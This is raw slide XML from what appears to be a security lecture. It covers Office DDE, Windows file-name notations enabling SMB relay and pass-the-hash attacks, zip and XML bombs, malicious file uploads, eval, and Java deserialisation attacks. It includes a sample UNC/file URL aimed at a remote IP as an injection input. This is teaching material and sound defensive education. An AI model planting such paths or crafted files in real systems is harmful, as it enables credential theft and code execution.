            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" dirty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1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DDE warnings in Office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Microsoft initially claimed DDE was a feature, and not a bug, but later then did publish a security advisory in autumn 2017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68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50000" r="14563" b="19744"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2699792" y="3284984"/>
            <a:ext cx="4786966" cy="1376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39998" r="4326" b="23327"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115616" y="1319592"/>
            <a:ext cx="5544616" cy="1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5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1BB05-2363-E5C1-98B3-F2037A47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0" y="1012681"/>
            <a:ext cx="7952127" cy="54216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Windows supports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>many</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600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notations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>  for file names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classic MS-DOS notation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C:\MyData\file.txt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file URLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>                                         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file:///C|/MyData/file.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-259204">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>(Uniform Naming Convention)            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\\192.1.1.1\MyData\file.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="51841" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>which can be combined in fun ways, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>file://///192.1.1.1/MyData/file.txt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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Some notations cause </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unexpected behaviour  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>by involving other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protocols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UNC paths to remote servers are handled by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SMB protocol</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>SMB sends password hash to remote server to authenticate,                                                        aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pass the hash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1600" dirty="0"/>
              <a:t>This can be exploited by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SMB relay attacks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GB" sz="1400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>CVE-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-0834 in Windows telnet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2008</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-4037 in Windows XP/Server/Vista                                                                                                          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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-5166 in Chromium  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>……                                                                                        …                          …</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>- CVE-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-3085 &amp; CVE-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2016</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-4271 in Adobe Flash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…                                                           …            …</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>ZDI-16-395 in Foxit PDF viewer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Recall: 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complexity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and (unexpected) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>EXPRESSIITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data formats is bad</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="777611" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1451" dirty="0"/>
              <a:t>                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2177" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1451" dirty="0"/>
              <a:t>                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1270" dirty="0"/>
              <a:t>[Example thanks to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1270" dirty="0" err="1"/>
              <a:t>Björn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1270" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1270" dirty="0" err="1"/>
              <a:t>Ruytenberg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1270" dirty="0"/>
              <a:t>, https://blog.bjornweb.nl]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Titel 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96400895-9641-9132-873D-65C5D29D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177" dirty="0"/>
              <a:t>SMB relays: Injection attacks via Windows file names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27652" name="Tijdelijke aanduiding voor dianummer 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD619065-3C22-14D3-61E5-F1F5B8A31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BF0F52F-21B9-46B2-AFDF-3BA1C6F63242}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL">
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"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Fun files to upload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Just to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DoS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zip or XML bomb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40 Kb zip file can expands to 4GB when unzipped - aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zip of death</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1Kb XML file can expand to 3 GB when XML parser expands recursive definitions as part of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>canonicalisation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="16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To take over control in more interesting ways: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.exe file</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008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malformed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> PDF file to exploit flaw in PDF viewer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malformed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> XXX file to exploit flaw in XXX viewer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esp. for complex file formats with viewers in memory-unsafe languages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Word or Excel document with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>macros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>old-time favourite, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>harder to get working due to tighter settings &amp; taint tracking of downloaded files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000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>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRP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0419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Some programming languages have an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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/>
              <a:t>function  which treats an input string as code and executes it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>interpreted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> languages an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1800" dirty="0"/>
              <a:t> construct:                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript, python, Haskell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1800" i="1" dirty="0"/>
              <a:t>Why do languages have this?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Useful for functionality: it allows very ‘dynamic’ code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0"/>
              <a:t>Why is this a terrible idea?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Prime target for injection attacks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Complicates static analysis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9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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is evil and should never be used!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972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/>
              <a:t>(De)serialisation  </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Serialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> (aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>marshalling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pickling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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turning a data structure or object into sequence of bytes or string</a:t>
            </a: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dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> (aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unmarshalling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unpickling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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turning a sequence of bytes back into a data structure or object </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1451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633" i="1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i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Typically uses?</a:t>
            </a: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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	storing objects on disk,  transferring objects over network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="492074">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1633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633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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1361" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4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97125416-AB23-9B4F-1F8D-C3729A6DC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0" y="2383920"/>
            <a:ext cx="1439710" cy="96220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675D93-44A4-3564-A7A5-A3799985BE39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2852973" y="2750975"/>
          <a:ext cx="3589632" cy="2280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424">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="144451998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498676224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198337913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57886681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766186555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1219095493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57723690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4091211447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90762426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2090460784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912072379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5962639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84636768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522050838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072043552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512283201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3216510485"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="199424">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="425119622"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="228096"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p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 err="1"/>
                        <a:t>i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n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k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.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="8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5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="700" dirty="0"/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m</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="700" dirty="0"/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881613616"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A pink elephant with a baby elephant&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC4BB3DD-D0D6-765E-9B35-1B1A09AA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02" y="2383920"/>
            <a:ext cx="1439710" cy="96220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1157609-711F-F560-3F42-1281803A5B5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1959301" y="2645221"/>
            <a:ext cx="704301" cy="43960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GB" sz="1633">
              <a:latin typeface="Comic Sans MS" pitchFamily="6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A64E12-36A9-5126-BC96-13A19CED1CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6556321" y="2629043"/>
            <a:ext cx="704301" cy="439603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GB" sz="1633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 err="1"/>
              <a:t>Deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2799" dirty="0"/>
              <a:t> attacks in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400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/>
              <a:t>Code to read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Student</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0"/>
              <a:t> objects from a file    </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1633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2903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177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file contains serialised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33" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> objects,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33" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will execute the deserialization code from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Student.java</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="635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i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How would you attack this? </a:t>
            </a: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file contains other objects, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633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readObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will execute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> code for that class</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>So: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker can execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> code for any class on the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defTabSz="492074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633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If the object s is later discarded as garbage, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> because the cast fails,  the garbage collector will invoke its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>finalize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> methods</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>So: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker can execute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finalize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> method for any class on </a:t>
            </a:r>
            <a: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CLASSPATH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742873" lvl="1" indent="-285720" defTabSz="492074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72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1361" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24971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2CAA-3D0F-FDC7-4A62-E7CB065A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92074">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2799" dirty="0" err="1"/>
              <a:t>Deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2799" dirty="0"/>
              <a:t> attacks in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t> Java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EAB0B-C6AB-56D5-EDFC-754FECF0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25001"/>
            <a:ext cx="7760160" cy="5123520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="492074">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0"/>
              <a:t>Code to read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Student</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0"/>
              <a:t> objects from a file    </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0"/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FileInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("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tmp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/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students.ser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>") </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2903" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
